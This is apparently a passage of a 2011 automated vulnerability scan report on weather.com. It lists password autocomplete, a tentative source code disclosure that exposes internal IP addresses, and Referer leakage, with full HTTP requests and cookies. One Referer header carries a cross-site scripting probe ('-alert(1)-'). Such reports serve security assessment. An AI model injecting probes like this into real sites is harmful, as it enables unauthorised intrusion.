Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:32:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web1x10
VarnishSet: web
X-Varnish: 1455522174
Vary: Accept-Encoding
Content-Length: 96659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<HTML>
<HEAD>
<TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...

2.2. http://www.weather.com/services/desktop.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weather.com
Path:   /services/desktop.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /services/desktop.html HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x10
Expires: Thu, 24 Mar 2011 17:36:38 GMT
Connection: keep-alive
Content-Length: 96326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free Desktop Weather and Alerts from The Weather Channel</title>


<meta name="descr
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...

2.3. http://www.weather.com/weather/health/beauty/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather/health/beauty/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /weather/health/beauty/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Server: Apache
Vary: Accept-Encoding
SVRNAME: web2x11
Date: Thu, 24 Mar 2011 17:33:32 GMT
Connection: keep-alive
Content-Length: 116103


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


   <head>
       <meta http-equiv="co
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...

3. Source code disclosure
There are 3 instances of this issue:


3.1. http://www.weather.com/activities/driving/rushhour/

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.weather.com
Path:   /activities/driving/rushhour/

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /activities/driving/rushhour/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:32:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web1x10
VarnishSet: web
X-Varnish: 1455522174
Vary: Accept-Encoding
Content-Length: 96659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<HTML>
<HEAD>
<TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<
...[SNIP]...
<script type="text/javascript">
var OAS_query = '';
var gnSiteMode='';
   // Global Cache busting section
           // Global Cache busting section
   //
   // <% /**
       var remoteAddr="172.16.24.21";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       var bust_globalNav='/v.20100727.0';
       var bust_headerNavYUITypeAhead='/v.20100727.0';
       var bust_recentSearch='/v.20100621.1';
       var bust_s_code='/v.20110111.2';
       var bust_typeAhead='/v.20100621.1';
       var bust_swfObject='/v.20100621.1';
       var bust_flCheckFlookie='/v.20100621.1';
       var bust_eventBroadcaster='/v.20100727.0';
   // **/ %>


    var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";}
    if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";}
   if(ty
...[SNIP]...

3.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.weather.com
Path:   /mobile/swap/send_sms_to_phone.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x13
Expires: Thu, 24 Mar 2011 17:36:18 GMT
Connection: keep-alive
Content-Length: 34038

<HTML>
   <HEAD>
    <TITLE>Wireless Internet</title>
<script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap
...[SNIP]...
<script type="text/javascript">
var OAS_query = '';
var gnSiteMode='';
   // Global Cache busting section
           // Global Cache busting section
   //
   // <% /**
       var remoteAddr="172.16.24.21";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       var bust_globalNav='/v.20100727.0';
       var bust_headerNavYUITypeAhead='/v.20100727.0';
       var bust_recentSearch='/v.20100621.1';
       var bust_s_code='/v.20110111.2';
       var bust_typeAhead='/v.20100621.1';
       var bust_swfObject='/v.20100621.1';
       var bust_flCheckFlookie='/v.20100621.1';
       var bust_eventBroadcaster='/v.20100727.0';
   // **/ %>


    var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";}
    if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";}
   if(ty
...[SNIP]...

3.3. http://www.weather.com/services/desktop.html

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.weather.com
Path:   /services/desktop.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /services/desktop.html HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x10
Expires: Thu, 24 Mar 2011 17:36:38 GMT
Connection: keep-alive
Content-Length: 96326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free Desktop Weather and Alerts from The Weather Channel</title>


<meta name="descr
...[SNIP]...
<script type="text/javascript">
var OAS_query = '';
var gnSiteMode='';
   // Global Cache busting section
           // Global Cache busting section
   //
   // <% /**
       var remoteAddr="172.16.24.23";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       var bust_globalNav='/v.20100727.0';
       var bust_headerNavYUITypeAhead='/v.20100727.0';
       var bust_recentSearch='/v.20100621.1';
       var bust_s_code='/v.20110111.2';
       var bust_typeAhead='/v.20100621.1';
       var bust_swfObject='/v.20100621.1';
       var bust_flCheckFlookie='/v.20100621.1';
       var bust_eventBroadcaster='/v.20100727.0';
   // **/ %>


    var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";}
    if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";}
   if(ty
...[SNIP]...

4. Cross-domain Referer leakage
There are 6 instances of this issue:


4.1. http://www.weather.com/common/a21/makeRequest-2_3.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /common/a21/makeRequest-2_3.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /common/a21/makeRequest-2_3.html?pos=WX_Top300Variable&key=1300987733362 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1300987732569; fv=1; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:28:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web3x03
VarnishSet: web
X-Varnish: 2587929389
Vary: Accept-Encoding
Content-Length: 2503

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>Make a request</title>

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...

4.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /mobile/swap/send_sms_to_phone.html

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x13
Expires: Thu, 24 Mar 2011 17:36:18 GMT
Connection: keep-alive
Content-Length: 34038

<HTML>
   <HEAD>
    <TITLE>Wireless Internet</title>
<script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap
...[SNIP]...
<!-- DFP -->

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"></script>
<script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=K06578" CHARSET="ISO-8859-1"></script>
...[SNIP]...

4.3. http://www.weather.com/pagelet/apps/traffic/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

POST /pagelet/apps/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:00 GMT
Server: Apache
Vary: Accept-Encoding
nnCoection: close
SVRNAME: wxii1x04
X-Varnish: 1510914846
Date: Thu, 24 Mar 2011 17:40:00 GMT
Connection: keep-alive
Content-Length: 108234

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

<link href="http://s.imwx.com/v.20100719.135915/img/favicon.ico" rel="shortcut icon">
<link href="http://s.imwx.com/v.20100719.135915/img/favicon.ico" rel="icon">
<link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/common-1-base,common-2-header,common-3-search,common-4-content,common-5-footer,common-6-alerts,common-7-panels,common-8-ads,common-9-yui.css">
<!--[if IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/module-1-base,module-2-seasonpromo,module-3-dl,module-4-ontv,module-5-onthisday,module-6-forecastlanding,module-7-laplinker,module-8-localalerts,module-9-iwitness.css">
<!--[if IE 6]>
...[SNIP]...
<![endif]-->

<link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/weather-1-today,weather-2-media,weather-3-apps,weather-4-messaging.css" />
<style>
...[SNIP]...
</style>


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...
<div id="wx-page-inner">


                   <img src="http://b.imwx.com/b/page?type=top&pageID=60990" width="1" height="1" alt="" style="position:absolute;top:0px;left:0px;">


<script>
...[SNIP]...
<li><a href="http://www.classmeteo.com" onmousedown="setClick();" onMouseUp="this.href=intelliTrak({'href':this.href,'cm_ven' : 'weathercom','cm_cat' : 'header','cm_ite' : 'brand','cm_pla' : 'text'});" target="_self">Italia (Italiano)</a>
...[SNIP]...
<a href="http://iwitness.weather.com/_Carly-Enjoying-The-Snow/video/1491535/148597.html" from="nav_spotlight">
                                <img src="http://s.imwx.com/img/images/golden_loves_snow.jpg" alt="Spotlight Image" width="120"
                                   height="90" />
<br>
...[SNIP]...
<a href="/activities/travel/vacationplanner/destination/top10/beaches.html?id=1&" from="nav_spotlight">Top 10 Beach Picks&nbsp;
